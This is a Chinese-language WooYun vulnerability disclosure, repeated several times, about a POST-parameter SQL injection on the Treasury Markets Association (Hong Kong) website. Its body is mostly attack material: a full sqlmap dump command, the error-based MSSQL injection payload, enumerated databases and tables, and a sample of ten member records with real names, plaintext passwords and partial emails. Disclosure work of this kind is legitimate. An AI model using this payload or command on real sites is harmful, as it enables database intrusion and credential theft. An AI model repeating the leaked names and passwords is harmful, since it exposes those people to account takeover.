財資市場公會某處存在POST型SQL植入漏洞（上百萬曆史/20萬備份文件/用戶姓名/密碼及郵箱泄露）（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153995

漏洞标题：財資市場公會某處存在POST型SQL植入漏洞（上百萬曆史/20萬備份文件/用戶姓名/密碼及郵箱泄露）（香港地區）

漏洞作者：路人甲

提交时间：2015-11-25 09:33

修复时间：2015-11-30 09:34

公开时间：2015-11-30 09:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-25：细节已通知厂商并且等待厂商处理中
2015-11-30：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

The Treasury Markets Association (TMA) was incorporated through the institutionalisation of the Treasury Markets Forum of Hong Kong and the merger with ACI-The Financial Markets Association of Hong Kong in 2005. Principal functions of the TMA include promoting co-operation and synergy among market practitioners with a view to enhancing professionalism and the overall competitiveness of the treasury markets in Hong Kong, thereby maintaining the role as an international financial centre.

详细说明：

地址：http://**.**.**.**

python sqlmap.py -u "http://**.**.**.**" -p textfield --technique=E --form --random-agent --batch -D db_tma -T dbo.tblMember -C MemberId,MemberLName,MemberFullName,MemberPwd,MemberEmail --dump --start 1 --stop 10

Database: db_tma
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| dbo.tblmkt_fixhistory              | 690727  |
Database: db_tma_20121217
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| dbo.tblmkt_fixhistory              | 471251  |

Database: msdb
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| dbo.backupfile                     | 207040  |

Database: db_tma
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| dbo.tblMember                      | 3036    |
选取10个进行展示：
Database: db_tma
Table: tblMember
[10 entries]
+----------+-------------+---------------------------+-----------+------------------------------------+
| MemberId | MemberLName | MemberFullName            | MemberPwd | MemberEmail                        |
+----------+-------------+---------------------------+-----------+------------------------------------+
| 1        | Yam         | <blank>                   | joseph    | @.com                              |
| 100      | Poon        | <blank>                   | tpoon1    | kcpoon@**.**.**.**              |
| 1000     | Lee         | Lee Angela                | <blank>   | <blank>                            |
| 100002   | <blank>     | Cheung Anna               | <blank>   | acheung@**.**.**.**                 |
| 1001     | Wong        | Wong Wai Man, Peter       | PWTMA2006 | <blank>                            |
| 110      | Tse         | Tse Wing Yau              | 20152015  | <blank>                            |
| 1101     | Tang        | Tang Wan Shing            | hellohk   | billtang1030@**.**.**.**             |
| 1102     | Tsang       | Tsang Man Leung, Hugh     | <blank>   | hughml_tsang@**.**.**.** |
| 1103     | Wong        | Wong Wing Cheong, Stephen | hellohk   | <blank>                            |
| 1200     | Thong       | Thong Hiu Chong, Elmen    | smart123  | <blank>                            |
+----------+-------------+---------------------------+-----------+------------------------------------+

漏洞证明：

---
Parameter: textfield (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: textfield=aNIB'+(SELECT 'BZrt' WHERE 6983=6983 AND 7380=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7380=7380) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))))+'&imageField.x=1&imageField.y=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user:    'usr_tma'
current user is DBA:    False
database management system users [2]:
[*] sa
[*] usr_tma
database management system users password hashes:
[*] sa [1]:
    password hash: NULL
[*] usr_tma [1]:
    password hash: NULL
Database: db_tma
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| dbo.tblmkt_fixhistory              | 690727  |
| dbo.tblmkt_fix                     | 156464  |
| dbo.tblmkt_fix_20150922            | 138446  |
| dbo.tblmkt_fix_20150713            | 113983  |
| dbo.tblmkt_fix_20150421            | 112229  |
| dbo.tblmkt_fix_20130923            | 94418   |
| dbo.tblmkt_fix_20130705            | 64130   |
| dbo.tblCourse                      | 64058   |
| dbo.tblCourse_20150929             | 62219   |
| dbo.tblmkt_fix_20121224            | 58338   |
| dbo.tblCourse_20140213             | 53987   |
| dbo.tblCourse_20140124             | 53798   |
| dbo.tblCourse_v1                   | 53798   |
| dbo.tblCourse_20130916             | 50453   |
| dbo.tblCourse_20121224xxx          | 47104   |
| dbo.tblFee                         | 17409   |
| dbo.tblFee_20121116                | 12595   |
| dbo.CPT1                           | 11321   |
| dbo.tblMemberHistory               | 8816    |
| dbo.tblData                        | 6793    |
| dbo.tblMemberRenew                 | 6459    |
| dbo.tblMemberRenew_history         | 4552    |
| dbo.tblMemberHistory_20121218      | 3973    |
| dbo.tblbank_intrate                | 3658    |
| dbo.tblMember                      | 3036    |
| dbo.tblMember_20121218             | 2843    |
| dbo.tblMember_20121224             | 2843    |
| dbo.countDuplicateMemberId         | 2739    |
| dbo.tblmkt_fix_20120318            | 2532    |
| dbo.tblCount                       | 1857    |
| dbo.tblMemberRenew_20121218        | 1703    |
| dbo.tblMemberRenew_20121218_notuse | 1703    |
| dbo.tblMemberRenew_20121212        | 1691    |
| dbo.tblEduct                       | 646     |
| dbo.tblEduct_20121224              | 490     |
| dbo.tblJob                         | 404     |
| dbo.tblCPT                         | 257     |
| dbo.tblNews                        | 185     |
| dbo.tblBloomberg                   | 157     |
| dbo.tblmkt_fixsetting              | 143     |
| dbo.tblmkt_fixsetting_20140916     | 111     |
| dbo.tblmkt_fixsetting_20150713     | 111     |
| dbo.tblComm                        | 100     |
| dbo.tblbank_holiday                | 89      |
| dbo.tblmkt_fixsetting_20130705     | 84      |
| dbo.tblPublication                 | 53      |
| dbo.seed                           | 37      |
| dbo.tblEventSection                | 30      |
| dbo.tblmkt_fixtyphoon_dtl          | 23      |
| dbo.tblUrl                         | 21      |
| dbo.tblEventSession                | 14      |
| dbo.tblbank                        | 13      |
| dbo.tblEvent                       | 12      |
| dbo.tblGroup                       | 12      |
| dbo.tblbank_intrate_config         | 11      |
| dbo.tblNB                          | 11      |
| dbo.tblmkt_fixtyphoon              | 10      |
| dbo.tblConfig                      | 8       |
| dbo.tblemailformat                 | 8       |
| dbo.tblemailformat_20140113        | 8       |
| dbo.tblemailformat_20140117        | 8       |
| dbo.tblemailformat_20140121        | 8       |
| dbo.tblemailformat_20141013        | 8       |
| dbo.tblemailformat_20141124        | 8       |
| dbo.tblemailformat_20151013        | 8       |
| dbo.tblemailformat_20151113        | 8       |
| dbo.tblRegForm                     | 8       |
| dbo.tblemailformat_20121224        | 7       |
| dbo.tblemailformat_20131209        | 7       |
| dbo.tblemailformat_20131230        | 7       |
| dbo.tblStatus                      | 5       |
| dbo.tblstaff                       | 4       |
| dbo.tblPMComm                      | 3       |
| dbo.tblPubCat                      | 3       |
| dbo.tblbank_staff                  | 2       |
| dbo.tblAudit                       | 1       |
| dbo.tblbank_intrate_typhoon        | 1       |
| dbo.tblbank_msg                    | 1       |
| dbo.tblBg                          | 1       |
| dbo.tblConsult                     | 1       |
| dbo.tblGoverence                   | 1       |
| dbo.tblMemberRenewSetting          | 1       |
| dbo.tblObj                         | 1       |
| dbo.tblSys                         | 1       |
+------------------------------------+---------+
Database: db_tma_20121217
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| dbo.tblmkt_fixhistory              | 471251  |
| dbo.tblmkt_fix                     | 58141   |
| dbo.tblCourse                      | 47000   |
| dbo.tblFee                         | 12606   |
| dbo.tblFee_20121116                | 12595   |
| dbo.tblMemberHistory               | 3966    |
| dbo.tblMember                      | 2843    |
| dbo.countDuplicateMemberId         | 2739    |
| dbo.tblmkt_fix_20120318            | 2532    |
| dbo.tblbank_intrate                | 2072    |
| dbo.tblbank_intrate_history        | 1910    |
| dbo.tblCount                       | 1857    |
| dbo.tblMemberRenew                 | 1703    |
| dbo.tblMemberRenew_20121212        | 1691    |
| dbo.tblCPT                         | 189     |
| dbo.tblNews                        | 157     |
| dbo.tblComm                        | 96      |
| dbo.tblBloomberg                   | 85      |
| dbo.tblmkt_fixsetting              | 74      |
| dbo.tblPublication                 | 36      |
| dbo.seed                           | 35      |
| dbo.tblEventSection                | 30      |
| dbo.tblUrl                         | 21      |
| dbo.tblbank_holiday                | 20      |
| dbo.tblEventSession                | 14      |
| dbo.tblbank                        | 13      |
| dbo.tblEvent                       | 12      |
| dbo.tblGroup                       | 12      |
| dbo.tblbank_intrate_config         | 11      |
| dbo.tblNB                          | 10      |
| dbo.tblConfig                      | 8       |
| dbo.tblRegForm                     | 8       |
| dbo.tblemailformat                 | 6       |
| dbo.tblStatus                      | 5       |
| dbo.tblPMComm                      | 3       |
| dbo.tblstaff                       | 3       |
| dbo.tblbank_staff                  | 2       |
| dbo.tblbank_intrate_typhoon        | 1       |
| dbo.tblbank_msg                    | 1       |
| dbo.tblBg                          | 1       |
| dbo.tblMemberRenewSetting          | 1       |
| dbo.tblSys                         | 1       |
+------------------------------------+---------+
Database: msdb
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| dbo.backupfile                     | 207040  |
| dbo.backupset                      | 103520  |
| dbo.backupmediafamily              | 103519  |
| dbo.backupmediaset                 | 103519  |
| dbo.syspolicy_configuration        | 4       |
+------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: master
Table: sql_logins
[1 column]
+---------------+-----------+
| Column        | Type      |
+---------------+-----------+
| password_hash | varbinary |
+---------------+-----------+
Database: msdb
Table: backupset
[1 column]
+-----------------------+
| Column                |
+-----------------------+
| is_password_protected |
+-----------------------+
Database: msdb
Table: backupmediaset
[1 column]
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| is_password_protected | bit  |
+-----------------------+------+
Database: msdb
Table: backupset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0                     |
+-----------------------+
Database: msdb
Table: backupmediaset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0                     |
+-----------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: textfield (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: textfield=aNIB'+(SELECT 'BZrt' WHERE 6983=6983 AND 7380=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7380=7380) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))))+'&imageField.x=1&imageField.y=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
columns LIKE 'pass' were found in the following databases:
Database: master
Table: sql_logins
[1 column]
+---------------+-----------+
| Column        | Type      |
+---------------+-----------+
| password_hash | varbinary |
+---------------+-----------+
Database: msdb
Table: backupset
[1 column]
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| is_password_protected | bit  |
+-----------------------+------+
Database: msdb
Table: backupmediaset
[1 column]
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| is_password_protected | bit  |
+-----------------------+------+
Database: msdb
Table: backupset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0                     |
+-----------------------+
Database: msdb
Table: backupmediaset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0                     |
+-----------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: textfield (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: textfield=aNIB'+(SELECT 'BZrt' WHERE 6983=6983 AND 7380=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7380=7380) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))))+'&imageField.x=1&imageField.y=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [11]:
[*] db_betav1
[*] db_oldweb_tma
[*] db_tma
[*] db_tma_20121217
[*] db_tma_20121223
[*] db_tma_test
[*] db_tma_test2
[*] master
[*] model
[*] msdb
[*] tempdb
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: textfield (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: textfield=aNIB'+(SELECT 'BZrt' WHERE 6983=6983 AND 7380=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7380=7380) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))))+'&imageField.x=1&imageField.y=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: db_tma
Table: tblMember
[50 columns]
+--------------------+
| Column             |
+--------------------+
| Member2Addr1       | nvarchar |
| MemberACIDC        | nvarchar |
| MemberACIDCYear    | nvarchar |
| MemberACIDip       | nvarchar |
| MemberACIDipYear   | nvarchar |
| MemberACIM         | nvarchar |
| MemberACIQuali     | nvarchar |
| MemberACISC        | nvarchar |
| MemberACISCYear    | nvarchar |
| MemberAddr1        | nvarchar |
| MemberAddr2        | nvarchar |
| MemberAddr3        | nvarchar |
| MemberCease        | nvarchar |
| MemberCName        | nvarchar |
| MemberCollege      | nvarchar |
| MemberContactTel   | nvarchar |
| MemberCreateDate   | datetime |
| Memberdisclosure   | char     |
| MemberDOJ          | nvarchar |
| MemberEmail        | nvarchar |
| MemberExpectGrad   | datetime |
| MemberField        | nvarchar |
| MemberFName        | nvarchar |
| MemberFullName     | nvarchar |
| MemberId           | int      |
| MemberInst         |
| MemberLName        | nvarchar |
| MemberLogin        | nvarchar |
| MemberMajor        |
| MemberMTel         |
| MemberPosition     | nvarchar |
| MemberProposer     | nvarchar |
| MemberProposerInst | nvarchar |
| MemberPwd          | nvarchar |
| MemberRenewal      | nvarchar |
| MemberRenewAlert   |
| MemberRmk          | nvarchar |
| MemberSeconder     |
| MemberSeconderInst | nvarchar |
| MemberSex          | nvarchar |
| MemberStatus       |
| MemberStudentId    | nvarchar |
| MemberStudyForm    | datetime |
| MemberStudyTo      | datetime |
| MemberTel          | nvarchar |
| MemberTitle        |
| MemberTMACDSYear   |
| MemberTMC          | nvarchar |
| MemberTMCYear      |
| OldMemberGroup     |
+--------------------+

| dbo.tblMember                      | 3036    |

选择前十个进行测试：

Database: db_tma
Table: tblMember
[10 entries]
+----------+-------------+---------------------------+-----------+------------------------------------+
| MemberId | MemberLName | MemberFullName            | MemberPwd | MemberEmail                        |
+----------+-------------+---------------------------+-----------+------------------------------------+
| 1        | Yam         | <blank>                   | joseph    | @.com                              |
| 100      | Poon        | <blank>                   | tpoon1    | kcpoon@**.**.**.**              |
| 1000     | Lee         | Lee Angela                | <blank>   | <blank>                            |
| 100002   | <blank>     | Cheung Anna               | <blank>   | acheung@**.**.**.**                 |
| 1001     | Wong        | Wong Wai Man, Peter       | PWTMA2006 | <blank>                            |
| 110      | Tse         | Tse Wing Yau              | 20152015  | <blank>                            |
| 1101     | Tang        | Tang Wan Shing            | hellohk   | billtang1030@**.**.**.**             |
| 1102     | Tsang       | Tsang Man Leung, Hugh     | <blank>   | hughml_tsang@**.**.**.** |
| 1103     | Wong        | Wong Wing Cheong, Stephen | hellohk   | <blank>                            |
| 1200     | Thong       | Thong Hiu Chong, Elmen    | smart123  | <blank>                            |
+----------+-------------+---------------------------+-----------+------------------------------------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-11-30 09:34

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153995

漏洞标题：財資市場公會某處存在POST型SQL植入漏洞（上百萬曆史/20萬備份文件/用戶姓名/密碼及郵箱泄露）（香港地區）

相关厂商：財資市場公會

漏洞作者：路人甲

提交时间：2015-11-25 09:33

修复时间：2015-11-30 09:34

公开时间：2015-11-30 09:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153995

漏洞标题：財資市場公會某處存在POST型SQL植入漏洞（上百萬曆史/20萬備份文件/用戶姓名/密碼及郵箱泄露）（香港地區）

相关厂商：財資市場公會

漏洞作者： 路人甲

提交时间：2015-11-25 09:33

修复时间：2015-11-30 09:34

公开时间：2015-11-30 09:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0153995"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云